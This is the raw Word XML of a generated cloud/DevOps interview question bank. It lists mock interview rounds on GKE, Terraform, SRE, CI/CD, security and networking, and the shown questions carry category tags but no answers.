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2947 unique questions with answers  •  Generated 2026-07-15</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>This document combines every question and answer from the ai-mock-interviewer question bank: the 77 fixed practice mock interview rounds, the full topic-organized technical question bank (GCP, Kubernetes/GKE, Terraform, Docker, CI/CD, Observability, Security, Networking, Linux, System Design, SRE/behavioral, Python, Go, FastAPI, Ansible, Scripting, Coding Exercises, MLOps, and LLMOps/GenAI), and the Technology Risk Lead track.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Part 1 — Fixed Mock Interview Rounds (1–77)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Each round is a fixed, realistic mock interview set. Use one round per practice session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 1 - GKE Production Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Configuration drift: How would you detect and prevent configuration drift across applications, clusters, and cloud infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. SRE fundamentals: Design an SLO for a customer-facing API running on GKE. What SLIs would you choose, how would you calculate error budget, and how would it affect releases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Cloud Monitoring: How would you design alerting policies in Google Cloud Monitoring to reduce alert fatigue and focus on user impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Ingress controller: How would you debug an ingress path returning 404 or 502, from DNS to load balancer to ingress controller to service endpoints?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Kubernetes Secrets: How would you compare Kubernetes Secrets, Secret Manager, External Secrets Operator, Sealed Secrets, and CSI drivers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Pipeline caching: When can ML pipeline caching help, and when can it hide stale data or bad assumptions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Go services: If asked to build a Kubernetes controller or CLI in Go, how would you approach the design even if Go is not your primary language?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Reliability review: What would you check before certifying a service as production-ready on GCP/GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 2 - Terraform and GCP Platform Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Terraform expert: How would you design reusable Terraform modules for GCP networking, IAM, GKE, Cloud Run, observability, and security so teams can consume them safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Compute Engine operations: A Linux VM behind a load balancer has high CPU, many TIME_WAIT connections, and intermittent TLS errors. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. IAM recommender: How would you use IAM Recommender and audit logs to reduce over-permissioned service accounts safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Developer experience: How would you measure whether your platform improves developer experience and delivery speed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Capacity incident: A regional capacity shortage affects node pool scaling. How would you mitigate and redesign for resilience?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. VPC Service Controls: When would you use VPC Service Controls, what problems does it solve, and what operational pain can it introduce?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. GKE multi-cluster: When would you use multiple GKE clusters versus one shared cluster, and how would you handle traffic, identity, policy, and operations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. BigQuery/data reliability: How would you approach BigQuery or data pipeline reliability when platform teams own infrastructure but data teams own pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 3 - SRE Incident and Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Alert fatigue: You inherit 500 alerts and noisy on-call. How would you rationalize alerts using SLOs and ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Observability maturity: How would you assess whether an organization has mature observability or just many dashboards?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. TLS rotation: How would you rotate TLS certificates for production ingress without downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Artifact Registry: How would you design Artifact Registry repositories, IAM, cleanup policies, scanning, and promotion between environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Immutable infrastructure: What does immutable infrastructure mean in cloud platforms, and when is mutable infrastructure still acceptable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. CI/CD design: Design a safe promotion workflow from commit to production using GitHub Actions, Cloud Build, Jenkins, artifact promotion, approvals, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. SLO burn rate: Explain multi-window multi-burn-rate alerting and how you would tune alerts for fast and slow burns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8.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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 4 - CI/CD and GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. ArgoCD drift: A team says ArgoCD shows drift between Git and the cluster. How would you investigate and safely reconcile it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform monorepo vs multi-repo: How would you decide repository structure for Terraform modules, environments, and app teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Secrets rotation: How would you rotate secrets or keys for production services without downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Prometheus scale: Prometheus is overloaded with high cardinality metrics. How would you debug and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Capacity planning: How would you design capacity planning for GKE node pools supporting both web services and batch or ML workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Pipeline orchestration: Compare Airflow, Dagster, Kubeflow, and Vertex AI Pipelines for ML/platform use cases. How would you choose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud Build: How would you design Cloud Build pipelines for Docker builds, vulnerability scanning, provenance, tests, and deployment promotion?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Organization policy: Which GCP org policies would you enforce for a secure baseline, and how would you handle exceptions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 5 - Cloud Security and DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Supply chain security: How would you implement image scanning, provenance, Binary Authorization, SBOMs, and deployment policies for containers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Container startup: A container works locally but fails in Kubernetes. How would you debug entrypoint, env vars, filesystem, permissions, and security context?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Terraform Enterprise: Explain how you would implement Terraform Enterprise workspaces, remote state, policy as code, approvals, and module versioning for a large GCP platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Hybrid connectivity: A service is slow over VPN or Interconnect. How would you troubleshoot latency, MTU, routes, BGP, firewall rules, and DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Backstage and IDP: How would you design a Backstage-style golden path for creating a new service on GCP with CI/CD, Terraform, monitoring, and security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Observability platform: How would you design observability for a platform team so developers get useful golden signals without creating noisy alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud Armor: Design a Cloud Armor and load balancing strategy for an internet-facing service. How would you handle WAF rules, rate limits, exceptions, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Autoscaling tradeoffs: Explain HPA, VPA, and cluster autoscaler. When can they conflict, and how would you tune them for a production workload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 6 - Observability and Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Firewall governance: How would you design firewall rule ownership, logging, review, and cleanup across many GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. ML feature store: What reliability and governance concerns would you consider for an ML feature store?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. CrashLoopBackOff: A pod is stuck in CrashLoopBackOff in production. Give me your exact Kubernetes troubleshooting workflow and the commands or signals you would check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Migration: How would you migrate an on-prem application to GCP with minimal downtime? Cover networking, data, CI/CD, observability, security, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Cloud Storage lifecycle: How would you design lifecycle, retention, versioning, object holds, CMEK, and audit logging for compliance-sensitive storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. OpenTofu: If a company asks about Terraform versus OpenTofu, how would you explain the tradeoffs for enterprise platform teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Observability: An alert says p95 latency increased from 200ms to 2s after a deployment. How would you investigate using Prometheus, Grafana, Cloud Logging, logs, and traces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Kubernetes probes: How would you design readiness, liveness, and startup probes for a slow-starting service to avoid cascading failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 7 - GCP Networking and Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Cloud Run security: How would you expose an internal Cloud Run service securely using IAM, ingress settings, VPC connector, load balancer, and service-to-service auth?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Pub/Sub incident: A downstream service outage caused Pub/Sub backlog. How would you recover safely without overloading dependencies or losing messages?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
